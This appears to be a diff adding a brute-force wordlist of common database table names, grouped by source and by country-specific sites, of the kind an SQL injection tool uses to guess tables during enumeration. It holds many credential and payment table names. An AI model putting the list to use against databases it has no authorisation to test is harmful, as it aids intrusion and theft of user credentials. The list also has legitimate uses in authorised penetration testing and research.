+dtb_products +words +dtb_question +UM_USER_PERMISSIONS +exam +commande +viktorina_ge +dtb_products_class +subscribe +page_restrictions +querycache_info +cdv_map_feature +oidtest +Link_table +guava_users +connectormacassocs +moduleexecs +guava_groups +Institution +sconfig +shared_secret_identity +platforms +BORROWER +phpbb_acl_options +markers +Population +shipping +guava_preferences +rating +UserCapability +Priority +rec_jobs +ezin_sections +Descriptions_Regions +SPACE +geo_Sea +DATA_ORG +Contributor +flag + +# Various Joomla tables + +jos_vm_product_download +jos_vm_coupons +jos_vm_product_reviews +jos_core_acl_aro +jos_vm_shopper_vendor_xref +jos_stats_agents +jos_vm_orders +jos_poll_menu +jos_content_rating +jos_vm_vendor +jos_vm_product_mf_xref +jos_vm_export +jos_polls +jos_content_frontpage +jos_vm_userfield_values +jos_categories +jos_poll_data +jos_vm_manufacturer +jos_vm_order_user_info +jos_core_acl_groups_aro_map +jos_messages +jos_vm_zone_shipping +jos_bannertrack +jos_vm_order_status +jos_modules_menu +jos_vm_product_type +jos_vm_product_type_parameter +jos_vm_tax_rate +jos_core_log_items +jos_modules +jos_users +jos_vm_product_category_xref +jos_vm_product_attribute +jos_poll_date +jos_vm_vendor_category +jos_vm_state +jos_vm_country +jos_weblinks +jos_vm_cart +jos_vm_shipping_label +jos_vm_manufacturer_category +jos_vm_shopper_group +jos_vm_product_votes +jos_vm_currency +jos_vm_creditcard +jos_menu +jos_groups +jos_messages_cfg +jos_vm_order_payment +jos_content +jos_bannerclient +jos_vm_product_discount +jos_core_log_searches +jos_vm_auth_user_group +jos_contact_details +jos_vm_auth_group +jos_vm_waiting_list +jos_vm_category_xref +jos_newsfeeds +jos_vm_auth_user_vendor +jos_vm_user_info +jos_vm_function +jos_vm_product_files +jos_vm_userfield +jos_vm_shipping_carrier +jos_core_acl_aro_map +jos_vm_shipping_rate +jos_vm_product +jos_vm_product_product_type_xref +jos_core_acl_aro_groups +jos_templates_menu +jos_menu_types +jos_plugins +jos_session +jos_vm_order_item +jos_vm_module +jos_vm_product_attribute_sku +jos_vm_product_price +jos_vm_csv +jos_migration_backlinks +jos_vm_product_relations +jos_core_acl_aro_sections +jos_vm_order_history +jos_banner +php_users +ALL_USERS +banned_users +users_tmp +users_club +publicusers +cmsusers + +# List provided by Anastasios Monachos (anastasiosm@gmail.com) + +blacklist +cost +moves +pelates +tamio +tameio +xristes +zones +tamio_pelates +kwdikos +addressbookgrp +sendmsgs +publicationauthor +publicationfile +topicpublication +userrights +comp_group +computers_ID +event_log +networking +routing +software_licenses +ips +arxeia +SMS_TABLE +TABLE_PRIVILEGE_MAP +AMUSER +CONTACTTYPE +CONTENT +DOWNLOADGROUP +DOWNLOADS +DOWNLOADTYPE +EMAIL +ENQUIRY +FACTSHEET +FUND +FUNDGROUP +HISTORY +MANAGEMENTGROUP +SUBSCRIBE +TBLUSERS +TBLLIST +TBLLOG +TBLPROFILES +TBLREPORTS +TBLTRANSACTIONS +TBLRETAILUSERS +TBLCORPUSERS +TBLCORPORATEUSERS + +# List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) + +tbladmins +sort +_wfspro_admin +4images_users +a_admin +adm +admin_login +admin_user +admin_userinfo +administer +administrable +administrate +administration +administrator +administrators +adminrights +adminuser +art +article_admin +articles +artikel +aut +autore +backend +backend_users +backenduser +bbs +chat_config +chat_messages +chat_users +clubconfig +content +cpg_config +cpg132_users +customers_basket +dbadmins +dealer +dealers +diary +download +Dragon_users +e107_user +fusion_user_groups +fusion_users +ibf_admin_sessions +ibf_conf_settings +ibf_members +ibf_members_converge +ibf_sessions +icq +index +info +ipb_sessions +joomla_users +jos_blastchatc_users +jos_comprofiler_members +jos_joomblog_users +jos_moschat_users +knews_lostpass +korisnik +korisnici +kpro_adminlogs +kpro_user +login_admin +login_admins +login_user +login_users +logins +logon +logs +lost_pass +lost_passwords +lostpass +lostpasswords +m_admin +main +mambo_session +mambo_users +manage +manager +mb_users +member +memberlist +minibbtable_users +mitglieder +movie +mybb_users +mysql +name +names +news_lostpass +newsletter +nuke_authors +nuke_bbconfig +nuke_config +nuke_popsettings +nuke_users +obb_profiles +parol +partners +passes +password +perdorues +perdoruesit +phorum_session +phorum_user +phorum_users +phpads_clients +phpads_config +forum_users +poll_user +punbb_users +pwd +pwds +reg_user +reg_users +registered +reguser +regusers +cards +site_login +site_logins +sitelogin +sitelogins +sites +smallnuke_members +smf_members +SS_orders +statistics +superuser +sysadmin +sysadmins +sysuser +sysusers +table +tables +tb_admin +tb_administrator +tb_login +tb_member +tb_members +tb_user +tb_username +tb_usernames +tb_users +tbl +tbl_user +tbl_users +tbluser +tbl_client +tblclients +tblclient +usebb_members +user_admin +user_info +user_list +user_login +user_logins +user_names +usercontrol +userinfo +userlogins +username +usernames +vb_user +vbulletin_session +vbulletin_user +voodoo_members +webadmin +webadmins +webmaster +webmasters +webuser +webusers +x_admin +xar_roles +xoops_bannerclient +xoops_users +yabb_settings +yabbse_settings +ACT_INFO +ActiveDataFeed +CategoryGroup +ChicksPass +ClickTrack +CountryCodes1 +CustomNav +DataFeedPerformance1 +DataFeedPerformance2 +DataFeedPerformance2_incoming +DataFeedShowtag1 +DataFeedShowtag2 +DataFeedShowtag2_incoming +dtproperties +Event +Event_backup +Event_Category +EventRedirect +Events_new +Genre +JamPass +MyTicketek +MyTicketekArchive +News +Passwords by usage count +PerfPassword +PerfPasswordAllSelected +Promotion +ProxyDataFeedPerformance +ProxyDataFeedShowtag +ProxyPriceInfo +Region +SearchOptions +Series +Sheldonshows +StateList +States +SubCategory +Subjects +Survey +SurveyAnswer +SurveyAnswerOpen +SurveyQuestion +SurveyRespondent +sysconstraints +syssegments +tblRestrictedPasswords +tblRestrictedShows +Ticket System Acc Numbers +TimeDiff +Titles +ToPacmail1 +ToPacmail2 +Total Members +UserPreferences +uvw_Category +uvw_Pref +uvw_Preferences +Venue +venues +VenuesNew +X_3945 +stone list +tblArtistCategory +tblArtists +tblConfigs +tblLayouts +tblLogBookAuthor +tblLogBookEntry +tblLogBookImages +tblLogBookImport +tblLogBookUser +tblMails +tblNewCategory +tblNews +tblOrders +tblStoneCategory +tblStones +tblUser +tblWishList +VIEW1 +viewLogBookEntry +viewStoneArtist +vwListAllAvailable +CC_info +CC_username +cms_user +cms_users +cms_admin +cms_admins +user_name +jos_user +table_user +mail +bulletin +cc_info +login_name +admuserinfo +userlistuser_list +SiteLogin +Site_Login +UserAdmin +Admins +Login +Logins + +# List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html + +account +accnts +accnt +user_id +members +usrs +usr2 +accounts +admin +admins +adminlogin +auth +authenticate +authentication +account +access +customers +customer +config +conf +cfg +hash +login +logout +loginout +log +member +memberid +password +pass_hash +pass +passwd +passw +pword +pwrd +pwd +store +store1 +store2 +store3 +store4 +setting +username +name +user +user_name +user_username +uname +user_uname +usern +user_usern +un +user_un +usrnm +user_usrnm +usr +usernm +user_usernm +user_nm +user_password +userpass +user_pass +user_pword +user_passw +user_pwrd +user_pwd +user_passwd + +# List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) + +wsop +Admin +Config +Settings +tbl_admin +tbl_admins +tbl_member +tbl_members +tblservers +id +uid +userid +user_id +auid +adminpass +LoginID +FirstName +LastName +cms_member +cms_members +Webmaster +Webuser +tbl_tbadmin +Adminlogin +useraccount +nguoidung +quanly +quantri +dangnhap +taikhoan +taikhoanquantri +useraccounts +nguoidungs +tbuser +tblogin +tbadmin +tbaccount +tbuseraccount +tbnguoidung +tbllogin +tbladmin +tblaccount +tbluseraccount +tblnguoidung +tbusers +tblogins +tbadmins +tbaccounts +tbuseraccounts +tbnguoidungs +tbllogins +tblaccounts +tbluseraccounts +tblnguoidungs +tb_account +tb_useraccount +tb_nguoidung +tbl_login +tbl_account +tbl_useraccount +tbl_nguoidung +tb_logins +tb_accounts +tb_useraccounts +tb_nguoidungs +tbl_logins +tbl_accounts +tbl_useraccounts +tbl_nguoidungs +tb_admins +adminid +admin_id +adminuserid +admin_userid +AdminUID +adminusername +admin_username +adminname +admin_name +usr +usr_n +usrname +usr_name +usrnam +useradmin +apwd +adminpaw +adminpwd +admin_pwd +admin_pass +adminpassword +admin_password +admin_passwords +usrpass +usr_pass +pass +userpass +user_pass +dbaccount +dbstudent +dbstudents +dbadmin +useres +dbuser +dbusers +personal +dbpersoon +list +lists +dblist +userpassword +user_password +userpwd +user_pwd +SecurityLevel +LastLoginDate +LoginIP +pword +ad +Konto +Konten +admin_psw +verwalten +verwaltet +administrieren +Verwaltung +Administratoren +adminpsw +adminupass +Kunst +Artikel +Autor +Buch +chat +Kunden +tblnews +banner +options +general +upload +uploads +file +akhbar +sb_host_admin +Firma +contenu +Kontakt +Kontakte +Inhalt +Kontrolle +controle +Kunde +Tagebuch +herunterladen +dw +glmm +gly +us +stnuser +stuser +stusers +stuseres +dbstaff +db_staff +staff_db +database +databases +test_user +user_test +test_users +users_test +Gruppe +Gruppen +guanli +guanliyuan +h_admin +Bilder +Mitgliederbereich +key +keywords +Anmeldung +Protokolle +Mitglied +Mitgliederliste +Mitglieder +mima +mm +mpassword +musername +Film +Filme +nc +new +Namen +Auftrag +Bestellungen +Passwort +power +psw +pswd +pw +pwd1 +jhu +webapps +ASP +Microsoft +sing +singup +singin +registeration +reg +registriert +root +roots +Tagung +Sitzungen +Einstellungen +Standorte +Statistiken +sys +Systemadministratoren +systime +Tisch +Tabellen +Titel +u +u_n +u_name +u_p +u_pass +Benutzer +user_pw +Benutzerliste +userpasswd +usr_pw +usrs +Benutzername +Benutzernamen +vip +Webbenutzer +sb_host_adminActiveDataFeed +Kategorie +Land +Suchoptionen +Serie +Staaten +UnterkKlasse +Umfrage +TotalMembers +Veranstaltungsort +Veranstaltungsorte +Ansicht1 +utilisateur +trier +compte +comptes +administrer +administrables +administrateur +administrateurs +auteur +livre +entreprise +concessionnaire +concessionnaires +telecharger +groupe +groupes +liens +connexion +principal +gestionnaire +membre +membres +films +nom +noms +ordre +commandes +partenaire +partenaires +passe +asse +enregistrs +paramtres +statistiques +super +tester +utilisateurs +intranet_users +utlisateur +Catogorie +Pays +Sujets +Sondage +Titres +Lieux +Affichage1Affichage1edu +win +pc +windows +mac +edu +bayviewpath +bayview +server +slserver +ColdFusion8 +ColdFusion +Cold +Fusion8 +Fusion +ststaff +sb_host_adminAffichage1 +Affichage1 +yhm +yhmm +Affichage1name +sb_host_adminAffichage1name + +# site:jp + +TypesTab + +# site:it + +utenti +categorie +attivita +comuni +discipline +Clienti +gws_news +SGA_XPLAN_TPL_V$SQL_PLAN +emu_services +nlconfig +oil_bfsurvey_pro +oil_users +oil_menu_types +oil_polls +Accounts +oil_core_log_searches +SGA_XPLAN_TPL_V$SQL_PLAN_SALL +oil_phocadownload_categories +gws_page +oil_bfsurveypro_choices +oil_poll_data +oil_poll_date +argomento +oil_modules +ruolo +oil_contact_details +emu_profiles +user_connection +oil_poll_menu +jos_jf_tableinfo +oil_templates_menu +oil_messages_cfg +oil_biolmed_entity_types +oil_phocagallery_votes +oil_core_acl_aro +regioni +oil_modules_menu +dati +gws_admin +oil_phocagallery_user_category +articoli +oil_content_frontpage +cron_send +oil_biolmed_measures +comune +SGA_XPLAN_TPL_DBA_TABLES +esame +oil_session +oil_phocadownload_licenses +oil_weblinks +oil_messages +oil_phocagallery_votes_statistics +dcerpcbinds +oil_jf_content +SGA_XPLAN_TPL_DBA_CONS_COLUMNS +SGA_XPLAN_TPL_DBA_IND_COLUMNS +gruppi +Articoli +gws_banner +gws_category +soraldo_ele_tipo +db_version +SGA_XPLAN_TPL_DBA_TAB_COLS +oil_biolmed_thesis +jos_languages +mlmail +SGA_XPLAN_TPL_V$SQLTEXT_NL +oil_bannertrack +oil_core_log_items +oil_rokversions +oil_bfsurveypro_34 +oil_bfsurveypro_35 +oil_google_destinations +gws_product +oil_jf_tableinfo +oil_phocadownload +oil_biolmed_blocks +oil_bfsurvey_pro_example +oil_bfsurvey_pro_categories +oil_bannerclient +oil_core_acl_aro_sections +SGA_XPLAN_TPL_V$SQL +oil_biolmed_land +connections +not_sent_mails +sga_xplan_test +oil_languages +utente +documento +gws_purchase +oil_plugins +oil_phocagallery +oil_menu +oil_biolmed_measures_by_entity_types +offers +anagrafica +gws_text +oil_groups +oil_content_rating +sent_mails +oil_banner +oil_google +gws_jobs +eventi +mlattach +oil_migration_backlinks +oil_phocagallery_categories +downloads +mlgroup +oil_sections +decodifica_tabelle +oil_phocagallery_img_votes +oil_phocagallery_img_votes_statistics +oil_dbcache +oil_content +p0fs +oil_biolmed_entity +oil_rokdownloads +oil_core_acl_groups_aro_map +gws_client +decodifica_campi +oil_phocagallery_comments +oil_categories +oil_newsfeeds +oil_biolmed_measurements +oil_phocadownload_user_stat +oil_core_acl_aro_groups +SGA_XPLAN_TPL_V$SQL_PLAN_STAT +oil_core_acl_aro_map +dcerpcrequests +oil_phocadownload_sections +oil_components +discipline_utenti +jos_jf_content +oil_phocadownload_settings +SGA_XPLAN_TPL_DBA_CONSTRAINTS +oil_biolmed_technician +oil_stats_agents +SGA_XPLAN_TPL_DBA_INDEXES + +# site:fr + +Avion +departement +Compagnie +produits +spip_auteurs +BDDJoueurs_alliance +spip_articles +spip_syndic +pays +spip_auteurs_rubriques +spip_mots_forum +spip_signatures +diplomatie +spip_mots_breves +spip_forum +spip_auteurs_messages +spip_documents +spip_messages +spip_index_dico +spip_meta +spip_petitions +spip_mots_syndic +spip_types_documents +etudiant +spip_groupes_mots +spip_documents_articles +spip_rubriques +spip_breves +agenda +BDDJoueurs_colonies +spip_mots_articles +spip_mots +spip_syndic_articles +spip_auteurs_articles +spip_mots_rubriques +BDDJoueurs +modulephoto +nuke_cities +forums +nuke_banner_positions +nuke_subscriptions +nuke_downloads_categories +nuke_journal_comments +nuke_bbranks +spip_documents_rubriques +nuke_confirm +service +nuke_bbthemes_name +nuke_autonews +nuke_bbdisallow +nuke_reviews_add +EDITEUR +nuke_links_newlink +nuke_faqcategories +etudiants +nuke_stats_year +nuke_bbsmilies +spip_mots_documents +spip_documents_breves +nuke_bbsearch_results +post +nuke_users_temp +nuke_blocks +nuke_reviews_main +themes +nuke_modules +nuke_banner_plans +nuke_links_votedata +spip_referers +inscription +BONUS +nuke_links_editorials +nuke_topics +nuke_bbprivmsgs_text +chatbox +nuke_referer +nuke_bbauth_access +nuke_journal_stats +nuke_faqanswer +nuke_banner_terms +message +nuke_bbvote_voters +nuke_pages_categories +spip_index +modulerubriquephoto +spip_visites +Role +nuke_public_messages +actualites +nuke_reviews_comments +nuke_downloads_votedata +nuke_headlines +nuke_downloads_editorials +enseignant +modulemessage +nuke_session +nuke_queue +nuke_main +nuke_bbposts +spip_ortho_cache +Enseignant +nuke_downloads_newdownload +sons +plurielanim +nuke_bbforums +nuke_bbsearch_wordmatch +nuke_bbvote_results +nuke_stats_date +nuke_bbwords +nuke_bbcategories +typecompte +nuke_stories +nuke_stats_month +personne +etablissement +nuke_counter +indexation +nuke_poll_desc +nuke_links_links +nuke_bbtopics +Utilisateurs +nuke_related +nuke_downloads_downloads +spip_versions_fragments +nuke_bbgroups +nuke_bbtopics_watch +nuke_bbuser_group +nuke_downloads_modrequest +spip_versions +Joueur +nuke_bbsessions +nuke_links_categories +directeur +Etudiant +nuke_bbposts_text +nuked_page +Personne +nuke_bbbanlist +Parametre +nuke_pollcomments +nuke_bbforum_prune +nuke_pages +nuke_links_modrequest +nuke_stats_hour +nuke_groups_points +nuke_reviews +nuke_bbthemes +modulemailling +agence +nuke_encyclopedia +nuke_bbsearch_wordlist +nuke_message +Equipe +nuke_comments +nuke_poll_check +nuke_journal +nuke_stories_cat +nuke_banner +nuke_groups +spip_visites_articles +nuke_encyclopedia_text +spip_referers_articles +nuke_bbvote_desc +Artiste +nuke_poll_data +nuke_bbprivmsgs +spip_ortho_dico +spip_caches + +# site:ru + +guestbook +binn_forum_settings +binn_forms_templ +binn_catprops +currency +binn_imagelib +binn_news +phpshop_opros_categories +binn_articles_messages +binn_cache +binn_bann_temps +binn_forum_threads +voting +binn_update +terms +binn_site_users_rights +binn_vote_options +binn_texts +binn_forum_temps +binn_order_temps +binn_basket +binn_order +binn_system_log +binn_vote_results +binn_articles +phpshop_categories +binn_maillist_temps +binn_system_messages +binn_articles_temps +binn_search_temps +banners +binn_imagelib_templ +binn_faq +binn_bann +phpshop_news +binn_menu_templ +binn_maillist_settings +binn_docs_temps +binn_bann_restricted +phpshop_system +binn_calendar_temps +binn_forum_posts +binn_cform_settings +phpshop_baners +phpshop_menu +binn_forms_fields +binn_cform_list +binn_vote +phpshop_links +mapdata +binn_submit_timeout +binn_forum_themes_temps +binn_order_elems +binn_templates +binn_cform +binn_catalog_template +binn_ct_templ_elems +binn_template_elems +binn_rubrikator_tlevel +binn_settings +binn_pages +binn_users +binn_categs +binn_page_elems +binn_site_users_temps +binn_vote_temps +binn_rubrikator_temps +binn_faq_temps +binn_sprav +setup_ +binn_basket_templ +binn_forum_maillist +binn_news_temps +phpshop_users +binn_catlinks +binn_sprav_temps +binn_maillist_sent +binn_forms_templ_elems +jubjub_errors +binn_maillist +binn_catrights +binn_docs +binn_bann_pages +binn_ct_templ +binn_menu +binn_user_rights +binn_cform_textarea +binn_catalog_fields +vykachka +binn_menu_tlevel +phpshop_opros +binn_form39 +binn_site_users +binn_path_temps +order_item + +# site:de + +tt_content +kunde +medien +Mitarbeiter +fe_users +dwp_wetter +dwp_popup +voraussetzen +dwp_foto_pictures +dwp_karte_speisen +dwp_news_kat +dwp_structur +dwp_foto_album +dwp_karte_kat +bestellung +dwp_content +be_users +Vorlesungen +dwp_content_pic +dwp_link_entries +dwp_ecard_album +persons +dwp_buchung_hotel +dwp_link_kat +dwp_news_absatz +Assistenten +Professoren +Studenten +dwp_ecard_pictures +lieferant +dwp_bewertung +mitarbeiter +gruppe +dwp_news_head +wp_post2cat +phpbb_forum_prune +crops +mein_doc +artikel_kategorie +kategorien +rel_person_paper +tx_tcdirectmail_bounceaccount +Akten +skins +riddles +ci_slogans +phpbb_vote_voters +account_map_event +roles +stellen +meetings +special_category +rel_paper_topic +kbase_category +attribut +phpbb_auth_access +zo_gruppe_stelle +zo_kontakt_stelle +hoeren +shop_settings +tutorial +motd_coding +artikel_variationsgruppen +dwp_kontakt +papers +gesuche +zahlung_weitere +ts2_server_privileges +artikel_variationen +artikel_optionen +chessgames +portale +products_images +phpbb_privmsgs_text +kurs +KUNDE +wp_linkcategories +tx_tcdirectmail_targets +tx_templavoila_datastructure +Adresse +bestellung_kunde +rel_person_topic +css_file +visual +account_multi +Adressen +phpbb_words +phpbb_disallow +kauf_artikel +music_association +phpbb_banlist +dokumente +greylist +backup +map_event +kreditkarte +house_extensions +address_book +crops_tpl +phpbb_vote_desc +versandkostenpreise +pruefen +gruppen +vertreter +phpbb_confirm +verkaeufer +be_groups +rel_person_organization +phpbb_privmsgs +buecher +kategorie +phpbb_sessions +phpbb_search_results +studierende +user_online_newyear +hersteller +object_link +adresse +address_format +newsletter_recipients +PERMISSIONS +user_uploads_pictures +festplatte +veranstalter +mein_doc_h +tx_tcdirectmail_clicklinks +phpbb_vote_results +phpbb_topics_watch +tx_tcdirectmail_lock +account_map +standort +gd +delete_reasons +tx_tcdirectmail_sentlog +valhalla +vis_typen +counter +kbase_main +music_items +kauf +payment_qenta +seite_abschnitt +trivia +mehrwertsteuer +massenmail +klassen +hilfe +geraet +tt_address +dg_books +portal_access +orders_recalculate +artikel_bestellung +kontakt +chesshistory +notizen +seite_layout +virgator_table +wp_categories +chessmessages + +# site:br + +endereco +pessoa +usuarios +estado +pedidos +CLIENTE +itens +telefone +empresa +PRODUTO +categoria +cidades +clientes +produtos +municipio +cliente +LT_PROCEDIMENTO +calendario +D_US_FAVORITOS +moradia +pessoa_telefone +contador +aidf +resumo +add_irm +M_ESQUEMA_PERMISSAO +duvida +LT_METODO_ATUALIZACAO +M_RELATORIOS +LT_SERIE +estados +LT_OBJETO +cidade +declaracaonf +especieaidf +S_SESSOES +D_PR_HONORARIOS +empresa_atividade +correcaostrategy +jos_docman_groups +D_US_RECENTE +notafiscal +solicitacao +pessoa_endereco +atividade +M_FATURAS +D_PR_APENSOS +agencia +LT_LANCAMENTO +D_US_AREA_DE_TRABALHO +D_FA_ITENS +dist_universidade +multastrategy_faixamulta +LT_TIPO_DE_ACAO +D_PR_EVENTOS +D_FA_PARCELAS +tipodeducao +D_PR_PARCELAMENTO +sala +D_US_EQUIPES_DO_USUARIO +cidadao +documentos +S_GLOBAL +M_CADASTRO_GERAL +jos_docman_licenses +guiaavulsa +solicitacaosenha +M_CUBOS +promocoes +grau_escolaridade +imagens +multastrategy +D_PR_PARTES +processo +gestor +imagem +categorias +LT_CLASSE_FORO +jurosstrategy +deducao +S_PARAMETROS +notafiscal_deducao +CAIXA +foto +M_FERIADOS +S_ORIGENS +guiaavulsa_itemguiaavulsa +situacaoitem +notafiscal_itemnotafiscal +cotacao +papel +M_EMAIL_FILA +D_PR_OBJETOS +dados_prefeitura +S_LOG +LT_FASE +D_PR_ADVOGADOS +M_USUARIO +projeto +LT_SITUACAO +D_PR_CUSTAS +grupoatividade +LT_NATUREZA +membros_familia +instituicao +emprestimos +itemguiaavulsa +D_EM_DESTINATARIO +LT_GRUPO +S_SEQUENCIAS +itemnotafiscal +disciplina +jos_docman +autorizacaonfe +tipo_bolsa +estoque +LT_JURISDICAO +serie +sse_estudante +LT_FOROS +perfil +despesa_familia +noticias +LT_GARANTIA +M_ESQUEMA_HORARIO +MM_NOTIFICACOES_DO_PROCESSO +jos_jce_plugins +grau_parentesco +D_PR_GARANTIAS +M_SERVICOS_PRESTADOS +LT_CATEGORIA +faixamulta +encerramento +M_PROCESSOS +dados_familia +MM_USUARIOS_DO_PROCESSO +LT_ENCERRAMENTO +LT_DECISAO +indice +contador_empresa +sse_familia +D_SE_INDICES +cursos +estado_civil +dados_estudante +LT_EQUIPES +LT_PROGNOSTICO +LT_EVENTO +jos_jce_groups +D_PR_DOCUMENTOS +D_PR_DESDOBRAMENTOS +logradouro +despesa_aluno +fiscal +LT_CUSTOM4 +convite +manutencao +LT_CUSTOM1 +LT_CUSTOM2 +LT_CUSTOM3 + +# site:es + +jos_respuestas +DEPARTAMENTO +EMPLEADO +TRABAJA_EN +DEPENDIENTE +LOCALIZACIONES_DEPT +PROYECTO +lineas_fac +pueblos +NUEVOS +CENTROS +BANCOS +PERSONAL +SUCURSALES +PRODUCTOS +provincias +jos_estadisticas +USUARIO +ALUM +MOVIMIENTOS +ACTOR +nuke_gallery_rate_check +ANTIGUOS +CUENTAS +vendedores +CLIENTES +articulos +DEPARTAMENTOS +PROFESORES +jos_preguntas +PEDIDOS +EMPLEADOS +nuke_gallery_pictures_newpicture +Books +grupo +facturas +aclaraciones +preguntas +personas +estadisticas + +# site:cn + +url +cdb_adminactions +BlockInfo +cdb_attachtypes +cdb_attachments +mymps_lifebox +cdb_buddys +mymps_payapi +LastDate +cdb_medals +mymps_payrecord +cdb_forumlinks +cdb_adminnotes +cdb_admingroups +cdb_creditslog +stkWeight +mymps_checkanswer +cdb_announcements +cdb_bbcodes +cdb_advertisements +cdb_memberfields +mymps_telephone +cdb_forums +cdb_forumfields +cdb_favorites +cdb_banned +cdb_crons +cdb_access +cdb_invites +sysmergeschemaarticles +CodeRuleType +cdb_membermagics +cdb_imagetypes +cdb_memberspaces +cdb_campaigns +pw_wordfb +cdb_paymentlog +cdb_adminsessions +pw_adminset +seen +t_snap +MSmerge_altsyncpartners +zl_deeds +pw_styles +pw_announce +cdb_pluginvars +pw_smiles +cdb_modworks +ncat +mymps_member_tpl +pw_threads +zl_admin +cdb_onlinetime +cdb_mythreads +cdb_members +spt_datatype_info +mymps_certification +mymps_badwords +seentype +mymps_cache +zl_article +spt_datatype_info_ext +cdb_debateposts +mymps_corp +mymps_member_album +mgbliuyan +pw_schcache +zl_finance +pw_banuser +mymps_news +cdb_pluginhooks +mymps_member_docutype +wp1_categories +cdb_magicmarket +MSmerge_errorlineage +cdb_activities +zl_baoming +cdb_orders +ad_ad +cdb_pms +cdb_magics +cdb_itempool +phpcms_announce +pw_actions +pw_msg +mymps_news_img +cdb_debates +cdb_magiclog +pw_forums +mymps_channel +cdb_polls +t_stat +pw_attachs +cdb_plugins +pw_membercredit +cdb_posts +mymps_member_category +cdb_activityapplies +zl_media +acctmanager +pw_usergroups +cdb_faqs +cdb_onlinelist +pw_hack +mymps_member_comment +Market +mymps_config +mymps_mail_template +mymps_advertisement +MSrepl_identity_range +pw_favors +mymps_crons +pw_config +pw_credits +cdb_failedlogins +mymps_member_docu +pw_posts +cdb_attachpaymentlog +cdb_myposts +cdb_polloptions +wp1_comments +cdb_caches +pw_members +mymps_upload +spt_provider_types +pw_sharelinks +pw_tmsgs +pw_polls +cdb_moderators +pw_bbsinfo +aliasregex +userfiles +acctmanager2 +cdb_pmsearchindex +mymps_news_focus +cdb_forumrecommend +publishers +zl_advertisement +guanggaotp +pw_memberinfo +aliastype +mymps_mail_sendlist +mymps_navurl + +# site:tr + +kullanici +kullanicilar +yonetici +yoneticiler +adres +adresler +yayincilar +yayinci +urun +urunler +kategori +kategoriler +ulke +ulkeler +siparis +siparisler +bayi +bayiler +stok +reklam +reklamlar +site +siteler +sayfa +sayfalar +icerik +icerikler +yazi +yazilar +genel +istatistik +istatistikler +duyuru +duyurular +haber +haberler +komisyon +ucret +ucretler +bilgi +basvuru +basvurular +kontak +kontaklar +kisi +kisiler +uye +uyeler +kayıt +kayıtlar +tel +telefon +telefonlar +numaralar +numara +kart +kartlar +kredi +krediler +kredikartı +fiyat +fiyatlar +odeme +odemeler +kategoriler +tbl_Uye +xml_kategoriler +tbl_siparis +tbl_googlemap +tbl_ilce +tbl_yardim +tbl_Resim +tbl_anket +tbl_Rapor +tbl_statsvisit +tbl_ticket +tbl_Cesit +tbl_xml +tbl_Cinsiyet +xml_urunler_temp +tbl_takvim +tbl_altkategori +tbl_mesaj +tbl_Haber +tbl_AdresTemp +tbl_Firma +tbl_Medya +xml_urunlerbirim +tbl_Yardim +tbl_medya +tbl_Video +xml_markalar_transfer +tbl_adrestemp +tbl_online +tbl_sehir +tbl_resim +tbl_Gorsel +tbl_doviz +tbl_gorsel +tbl_kampanya +tbl_Blog +tbl_Banners +tbl_koleksiyon +tbl_Galeri +tbl_Kampanya +tbl_Favori +tbl_sss +tbl_Banner +tbl_Faq +xml_markalar_temp +tbl_faq +tbl_Personel +tbl_Seo +tbl_adres +tbl_ayar +tbl_metin +tbl_AltKategori +tbl_kategori +tbl_Marka +tbl_blogkategori +tbl_ulke +tbl_sepetold +tbl_yorum +tbl_Fiyat +tbl_Reklam +tbl_Kategori +tbl_Yorum +tbl_semt +tbl_Tedarikci +xml_kampanyakategori +tbl_ozelgun +tbl_uyexml +tbl_rapor +tbl_seo +tbl_Indirim +tbl_Ilce +tbl_bulten +tbl_video +tbl_Ayar +tbl_fatura +tbl_cinsiyet +tbl_reklam +tbl_sliders +tbl_KDV +tbl_uye_img +tbl_siparisid +tbl_BlogKategori +tbl_Yonetici +tbl_kdv +tbl_Online +tbl_temsilci +tbl_Dil +tbl_banners +tbl_Mesaj +tbl_Logs +tbl_logs +tbl_fiyat +tbl_SSS +tbl_Puan +tbl_kargo +tbl_Statsvisit +tbl_Koleksiyon +tbl_dil +tbl_Sepetold +tbl_Fatura +tbl_yonetici +tbl_Yazilar +tbl_Temsilci +tbl_Kargo +tbl_cesit +tbl_uye +tbl_haber +tbl_SiparisID +tbl_Adres +tbl_Ozelgun +tbl_banka +tbl_Videogaleri +tbl_galeri +tbl_videogaleri +xml_urunresimleri +tbl_urun +tbl_Ticket +tbl_yazilar +tbl_Ulke +tbl_Urun +tbl_renk +tbl_Harita +tbl_Sepet +tbl_Sehir +tbl_Uye_Img +tbl_Semt +tbl_indirim +xml_kampanyakategori_transfer +tbl_Takvim +tbl_blog +tbl_Sliders +tbl_Renk +tbl_UyeXML +tbl_tedarikci +tbl_Fotogaleri +tbl_Doviz +tbl_Anket +tbl_Banka +tbl_Metin +tbl_XML +tbl_firma +tbl_harita +tbl_banner +tbl_sepet +tbl_fotogaleri +tbl_marka +tbl_Siparis +tbl_personel +tbl_puan +tbl_Bulten +tbl_favori +tbl_onlineusers + + + +# List provided by Pedrito Perez (0ark1ang3l@gmail.com) + +adminstbl +admintbl +affiliateUsers +hsa_user +tblmanager +tblmanagers +tblproduct +tblproducts +tuser +tusers +userstbl +usertbl + +# WebGoat + +user_data + +# https://laurent22.github.io/so-injections/ + +accounts +admin +baza_site +benutzer +category +comments +company +credentials +Customer +customers +data +details +dhruv_users +dt_tb +employees +events +forsale +friends +giorni +images +info +items +kontabankowe +login +logs +markers +members +messages +orders +order_table +photos +player +players +points +register +reports +rooms +shells +signup +songs +student +students +table +table2 +tbl_images +tblproduct +testv2 +tickets +topicinfo +trabajo +user +user_auth +userinfo +user_info +userregister +users +usuarios +utenti +wm_products +wp_payout_history +zamowienia + +# https://deliciousbrains.com/tour-wordpress-database/ + +wp_blogmeta +wp_blogs +wp_blog_versions +wp_commentmeta +wp_comments +wp_links +wp_options +wp_postmeta +wp_posts +wp_registration_log +wp_signups +wp_site +wp_sitemeta +wp_termmeta +wp_term_relationships +wp_terms +wp_term_taxonomy +wp_usermeta +wp_users + +# https://docs.joomla.org/Tables + +assets +bannerclient +banner +bannertrack +categories +components +contact_details +content_frontpage +content_rating +content +core_acl_aro_groups +core_acl_aro_map +core_acl_aro_sections +core_acl_aro +core_acl_groups_aro_map +core_log_items +core_log_searches +extensions +groups +languages +menu +menu_types +messages_cfg +messages +migration_backlinks +modules_menu +modules +newsfeeds +plugins +poll_data +poll_date +poll_menu +polls 